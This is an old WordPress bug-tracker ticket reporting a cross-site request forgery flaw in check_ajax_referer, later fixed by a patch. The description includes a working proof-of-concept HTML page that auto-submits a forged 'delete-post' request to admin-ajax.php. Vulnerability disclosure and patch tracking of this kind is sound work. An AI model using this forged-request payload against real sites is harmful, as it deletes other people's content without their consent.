Ticket #4939 (closed defect (bug): fixed)

Opened 1 year ago

Last modified 1 year ago

check_ajax_referer does not protect from CSRF at all

Reported by: xknown Assigned to: anonymous
Priority: high Milestone: 2.3
Component: Security Version: 2.3
Severity: normal Keywords:
Cc:

Description

check_ajax_referer only checks if the incoming request contains valid user credentials but wp_get_current_user still uses WP cookies to determine the current user, so anyone with a subscriber role (or another role) can perform CSRF attacks. 

<html>
<body>
	<form method="post" action="http://localhost/wp/wp-admin/admin-ajax.php">
		<input type="text" name="action" value="delete-post" />
		<input type="text" name="id" value="Post_ID" />
		<input type="text" name="cookie" value="wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password" />		
	</form>
	<script>document.forms[0].submit();</script>
</body>
</html>

Attachments

pluggable.diff (357 bytes) - added by xknown on 09/09/07 01:07:03.
Set current user in check_ajax_referer.
4939.diff (1.0 kB) - added by mdawaffe on 09/13/07 05:25:41.

Change History

09/09/07 01:07:03 changed by xknown

  • attachment pluggable.diff added.

Set current user in check_ajax_referer.

09/13/07 04:08:59 changed by mdawaffe

Rather than setting the user, we could check to see if the current user matches the user from the cookie and die('-1') otherwise.

09/13/07 05:25:41 changed by mdawaffe

  • attachment 4939.diff added.

09/13/07 21:37:06 changed by Nazgul

  • priority changed from normal to high.
  • milestone set to 2.3.

09/19/07 19:32:34 changed by ryan

  • status changed from new to closed.
  • resolution set to fixed.

(In [6138]) Extra protection in check_ajax_referer from mdawaffe. fixes #4939